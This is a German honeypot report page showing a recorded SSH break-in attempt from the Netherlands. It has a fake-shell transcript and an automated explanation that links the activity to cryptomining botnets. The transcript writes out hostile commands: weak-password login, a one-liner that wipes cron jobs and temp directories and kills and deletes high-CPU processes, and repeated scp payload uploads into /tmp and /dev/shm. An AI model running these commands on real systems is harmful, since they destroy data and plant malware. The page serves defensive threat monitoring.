ALLSmartSecurity
Mitschnitt

SSH-Angriff aus Niederlande: Schadcode nachladen und Einnisten per Cronjob

08.10.2026, 04:44 UTC · 93 Befehle · über ssh · Niederlande

Überblick

Dienst
ssh (Port 22)
Herkunft
Niederlande · TechTies Inc.
Probierte Zugangsdaten
gl02 / 1234567890

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
gl02@srv01: ~

gl02@srv01:~$ uname -s -v -n -r -m
Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64
gl02@srv01:~$ uname -m | awk '{printf $1}'
x86_64
gl02@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }'
391 days, 00:00
gl02@srv01:~$ lspci | egrep VGA && lspci | grep 3D
00:02.0 VGA compatible controller: Intel Corporation Atom/Celeron/Pentium Processor x5-E8000/J3xxx/N3xxx Integrated Graphics Controller (rev 21)
gl02@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14-
Intel(R) Celeron(R) CPU J1900 @ 1.99GHz
gl02@srv01:~$ curl ipinfo.io/org
AS60751
gl02@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1
bash: nvidia-smi: command not found
gl02@srv01:~$ nvidia-smi -q | grep "Product Name"
bash: nvidia-smi: command not found
gl02@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1
0
gl02@srv01:~$ uname -n | awk '{printf $1}'
nas
gl02@srv01:~$ uname -r | awk '{printf $1}'
4.19.0-25-amd64
gl02@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d…
bash: cache: command not found
gl02@srv01:~$ echo 1234567890 > /tmp/d.log
gl02@srv01:~$ scp -qt "/var/tmp/TJsFgAaE"
gl02@srv01:~$ scp -qt "/tmp/TJsFgAaE"
gl02@srv01:~$ scp -qt "/dev/shm/TJsFgAaE"
gl02@srv01:~$ uname -s -v -n -r -m
Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64
gl02@srv01:~$ scp -qt "/var/tmp/RkQRatYh"
gl02@srv01:~$ scp -qt "/tmp/RkQRatYh"
gl02@srv01:~$ scp -qt "/dev/shm/RkQRatYh"
gl02@srv01:~$ uname -s -v -n -r -m
Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64
gl02@srv01:~$ echo raspberry > /tmp/d.log
gl02@srv01:~$ scp -qt "/var/tmp/sdoahyTF"
gl02@srv01:~$ scp -qt "/tmp/sdoahyTF"
gl02@srv01:~$ scp -qt "/dev/shm/sdoahyTF"
gl02@srv01:~$ uname -s -v -n -r -m
Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64
gl02@srv01:~$ echo odoo123 > /tmp/d.log
gl02@srv01:~$ scp -qt "/var/tmp/WuBIGPtN"
gl02@srv01:~$ scp -qt "/tmp/WuBIGPtN"
gl02@srv01:~$ scp -qt "/dev/shm/WuBIGPtN"
gl02@srv01:~$ uname -s -v -n -r -m
Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64
gl02@srv01:~$ echo admin123 > /tmp/d.log
gl02@srv01:~$ scp -qt "/var/tmp/bwdbQCkH"
gl02@srv01:~$ scp -qt "/tmp/bwdbQCkH"
gl02@srv01:~$ scp -qt "/dev/shm/bwdbQCkH"
gl02@srv01:~$ uname -s -v -n -r -m
Linux 4.19.0-25-amd64 #1 SMP Debian 4.19.302-1 (2021-07-16) nas x86_64
gl02@srv01:~$ echo Qwerty > /tmp/d.log
gl02@srv01:~$ scp -qt "/var/tmp/BgWUtqvq"
gl02@srv01:~$ scp -qt "/tmp/BgWUtqvq"

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Ein Angreifer meldete sich mit schwachen Zugangsdaten über SSH an. Er führte eine Reihe von Systemabfragen durch, um Hardware, CPU und GPU zu identifizieren. Anschließend versuchte er, Dateien in verschiedene temporäre Verzeichnisse zu kopieren und Prozesse mit hoher CPU-Auslastung zu beenden.

Was die Befehle bewirken

Die Befehle uname und lscpu sammeln Informationen über das Betriebssystem und die Prozessoren. Mit nvidia-smi und lspci prüft der Angreifer auf vorhandene Grafikkarten, die für das Mining von Kryptowährungen nötig sind. Der Befehl crontab -r löscht geplante Aufgaben, um Konkurrenz zu entfernen, während ps aux Prozesse mit hoher CPU-Nutzung identifiziert und kill -9 diese beendet. Die scp -qt Befehle versuchen, Dateien in versteckte Ordner zu übertragen, was auf das Hochladen von Schadsoftware hindeutet.

Worauf es hinauslief

Das Ziel ist vermutlich die Installation von Kryptomining-Software oder einem Botnet-Client. Die intensive Prüfung der Grafikkarten deutet auf Mining hin, während das Beenden anderer Prozesse Platz für die eigene Last schaffen soll. Der Versuch, Dateien in /dev/shm zu schreiben, ist typisch für das Entpacken von Malware.

Einordnung

Dieses Muster ist sehr verbreitet und wird oft von automatisierten Skripten ausgeführt, die nach schwachen Passwörtern suchen. Die Kombination aus Hardware-Check und Prozess-Kill ist ein Standardverfahren für Kryptomining-Botnets.